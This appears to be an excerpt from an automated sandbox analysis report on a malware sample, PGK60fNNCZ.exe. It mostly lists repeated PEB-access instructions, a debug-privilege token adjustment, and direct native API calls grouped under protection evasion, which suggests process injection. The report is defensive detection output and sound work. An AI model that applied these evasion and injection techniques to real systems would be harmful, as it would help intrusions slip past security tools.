                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F965D0 mov eax, dword ptr fs:[00000030h]6_2_00F965D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]6_2_00FCA5D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]6_2_00FCA5D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE5CF mov eax, dword ptr fs:[00000030h]6_2_00FCE5CF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE5CF mov eax, dword ptr fs:[00000030h]6_2_00FCE5CF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB45B1 mov eax, dword ptr fs:[00000030h]6_2_00FB45B1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB45B1 mov eax, dword ptr fs:[00000030h]6_2_00FB45B1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104A456 mov eax, dword ptr fs:[00000030h]6_2_0104A456
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE59C mov eax, dword ptr fs:[00000030h]6_2_00FCE59C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C460 mov ecx, dword ptr fs:[00000030h]6_2_0101C460
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC4588 mov eax, dword ptr fs:[00000030h]6_2_00FC4588
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F92582 mov eax, dword ptr fs:[00000030h]6_2_00F92582
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F92582 mov ecx, dword ptr fs:[00000030h]6_2_00F92582
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC656A mov eax, dword ptr fs:[00000030h]6_2_00FC656A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC656A mov eax, dword ptr fs:[00000030h]6_2_00FC656A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC656A mov eax, dword ptr fs:[00000030h]6_2_00FC656A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104A49A mov eax, dword ptr fs:[00000030h]6_2_0104A49A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98550 mov eax, dword ptr fs:[00000030h]6_2_00F98550
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98550 mov eax, dword ptr fs:[00000030h]6_2_00F98550
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101A4B0 mov eax, dword ptr fs:[00000030h]6_2_0101A4B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE53E mov eax, dword ptr fs:[00000030h]6_2_00FBE53E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0535 mov eax, dword ptr fs:[00000030h]6_2_00FA0535
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100C730 mov eax, dword ptr fs:[00000030h]6_2_0100C730
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA6C7 mov ebx, dword ptr fs:[00000030h]6_2_00FCA6C7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA6C7 mov eax, dword ptr fs:[00000030h]6_2_00FCA6C7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC66B0 mov eax, dword ptr fs:[00000030h]6_2_00FC66B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01014755 mov eax, dword ptr fs:[00000030h]6_2_01014755
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC6A6 mov eax, dword ptr fs:[00000030h]6_2_00FCC6A6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E75D mov eax, dword ptr fs:[00000030h]6_2_0101E75D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94690 mov eax, dword ptr fs:[00000030h]6_2_00F94690
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94690 mov eax, dword ptr fs:[00000030h]6_2_00F94690
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC2674 mov eax, dword ptr fs:[00000030h]6_2_00FC2674
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103678E mov eax, dword ptr fs:[00000030h]6_2_0103678E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA660 mov eax, dword ptr fs:[00000030h]6_2_00FCA660
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA660 mov eax, dword ptr fs:[00000030h]6_2_00FCA660
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010447A0 mov eax, dword ptr fs:[00000030h]6_2_010447A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAC640 mov eax, dword ptr fs:[00000030h]6_2_00FAC640
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010107C3 mov eax, dword ptr fs:[00000030h]6_2_010107C3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9262C mov eax, dword ptr fs:[00000030h]6_2_00F9262C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC6620 mov eax, dword ptr fs:[00000030h]6_2_00FC6620
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8620 mov eax, dword ptr fs:[00000030h]6_2_00FC8620
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FAE627 mov eax, dword ptr fs:[00000030h]6_2_00FAE627
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E7E1 mov eax, dword ptr fs:[00000030h]6_2_0101E7E1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2619 mov eax, dword ptr fs:[00000030h]6_2_00FD2619
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA260B mov eax, dword ptr fs:[00000030h]6_2_00FA260B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F947FB mov eax, dword ptr fs:[00000030h]6_2_00F947FB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F947FB mov eax, dword ptr fs:[00000030h]6_2_00F947FB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E609 mov eax, dword ptr fs:[00000030h]6_2_0100E609
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB27ED mov eax, dword ptr fs:[00000030h]6_2_00FB27ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB27ED mov eax, dword ptr fs:[00000030h]6_2_00FB27ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB27ED mov eax, dword ptr fs:[00000030h]6_2_00FB27ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9C7C0 mov eax, dword ptr fs:[00000030h]6_2_00F9C7C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F907AF mov eax, dword ptr fs:[00000030h]6_2_00F907AF
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105866E mov eax, dword ptr fs:[00000030h]6_2_0105866E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105866E mov eax, dword ptr fs:[00000030h]6_2_0105866E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F98770 mov eax, dword ptr fs:[00000030h]6_2_00F98770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA0770 mov eax, dword ptr fs:[00000030h]6_2_00FA0770
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90750 mov eax, dword ptr fs:[00000030h]6_2_00F90750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2750 mov eax, dword ptr fs:[00000030h]6_2_00FD2750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2750 mov eax, dword ptr fs:[00000030h]6_2_00FD2750
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC674D mov esi, dword ptr fs:[00000030h]6_2_00FC674D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC674D mov eax, dword ptr fs:[00000030h]6_2_00FC674D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC674D mov eax, dword ptr fs:[00000030h]6_2_00FC674D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC273C mov eax, dword ptr fs:[00000030h]6_2_00FC273C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC273C mov ecx, dword ptr fs:[00000030h]6_2_00FC273C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC273C mov eax, dword ptr fs:[00000030h]6_2_00FC273C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC720 mov eax, dword ptr fs:[00000030h]6_2_00FCC720
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC720 mov eax, dword ptr fs:[00000030h]6_2_00FCC720
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90710 mov eax, dword ptr fs:[00000030h]6_2_00F90710
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC0710 mov eax, dword ptr fs:[00000030h]6_2_00FC0710
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010106F1 mov eax, dword ptr fs:[00000030h]6_2_010106F1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010106F1 mov eax, dword ptr fs:[00000030h]6_2_010106F1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E6F2 mov eax, dword ptr fs:[00000030h]6_2_0100E6F2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC700 mov eax, dword ptr fs:[00000030h]6_2_00FCC700
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]6_2_00FCC8F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]6_2_00FCC8F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E908 mov eax, dword ptr fs:[00000030h]6_2_0100E908
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0100E908 mov eax, dword ptr fs:[00000030h]6_2_0100E908
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C912 mov eax, dword ptr fs:[00000030h]6_2_0101C912
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0102892B mov eax, dword ptr fs:[00000030h]6_2_0102892B
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101892A mov eax, dword ptr fs:[00000030h]6_2_0101892A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE8C0 mov eax, dword ptr fs:[00000030h]6_2_00FBE8C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064940 mov eax, dword ptr fs:[00000030h]6_2_01064940
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01010946 mov eax, dword ptr fs:[00000030h]6_2_01010946
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01034978 mov eax, dword ptr fs:[00000030h]6_2_01034978
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01034978 mov eax, dword ptr fs:[00000030h]6_2_01034978
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C97C mov eax, dword ptr fs:[00000030h]6_2_0101C97C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90887 mov eax, dword ptr fs:[00000030h]6_2_00F90887
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94859 mov eax, dword ptr fs:[00000030h]6_2_00F94859
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F94859 mov eax, dword ptr fs:[00000030h]6_2_00F94859
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC0854 mov eax, dword ptr fs:[00000030h]6_2_00FC0854
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010189B3 mov esi, dword ptr fs:[00000030h]6_2_010189B3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010189B3 mov eax, dword ptr fs:[00000030h]6_2_010189B3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010189B3 mov eax, dword ptr fs:[00000030h]6_2_010189B3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA2840 mov ecx, dword ptr fs:[00000030h]6_2_00FA2840
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010269C0 mov eax, dword ptr fs:[00000030h]6_2_010269C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA830 mov eax, dword ptr fs:[00000030h]6_2_00FCA830
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov ecx, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB2835 mov eax, dword ptr fs:[00000030h]6_2_00FB2835
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105A9D3 mov eax, dword ptr fs:[00000030h]6_2_0105A9D3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E9E0 mov eax, dword ptr fs:[00000030h]6_2_0101E9E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC29F9 mov eax, dword ptr fs:[00000030h]6_2_00FC29F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC29F9 mov eax, dword ptr fs:[00000030h]6_2_00FC29F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C810 mov eax, dword ptr fs:[00000030h]6_2_0101C810
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]6_2_00F9A9D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC49D0 mov eax, dword ptr fs:[00000030h]6_2_00FC49D0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103483A mov eax, dword ptr fs:[00000030h]6_2_0103483A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103483A mov eax, dword ptr fs:[00000030h]6_2_0103483A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F909AD mov eax, dword ptr fs:[00000030h]6_2_00F909AD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F909AD mov eax, dword ptr fs:[00000030h]6_2_00F909AD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA29A0 mov eax, dword ptr fs:[00000030h]6_2_00FA29A0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026870 mov eax, dword ptr fs:[00000030h]6_2_01026870
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01026870 mov eax, dword ptr fs:[00000030h]6_2_01026870
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E872 mov eax, dword ptr fs:[00000030h]6_2_0101E872
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101E872 mov eax, dword ptr fs:[00000030h]6_2_0101E872
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E mov eax, dword ptr fs:[00000030h]6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E mov edx, dword ptr fs:[00000030h]6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E mov eax, dword ptr fs:[00000030h]6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB6962 mov eax, dword ptr fs:[00000030h]6_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB6962 mov eax, dword ptr fs:[00000030h]6_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB6962 mov eax, dword ptr fs:[00000030h]6_2_00FB6962
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0101C89D mov eax, dword ptr fs:[00000030h]6_2_0101C89D
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_010608C0 mov eax, dword ptr fs:[00000030h]6_2_010608C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88918 mov eax, dword ptr fs:[00000030h]6_2_00F88918
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F88918 mov eax, dword ptr fs:[00000030h]6_2_00F88918
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105A8E4 mov eax, dword ptr fs:[00000030h]6_2_0105A8E4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01064B00 mov eax, dword ptr fs:[00000030h]6_2_01064B00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCAAEE mov eax, dword ptr fs:[00000030h]6_2_00FCAAEE
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCAAEE mov eax, dword ptr fs:[00000030h]6_2_00FCAAEE
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
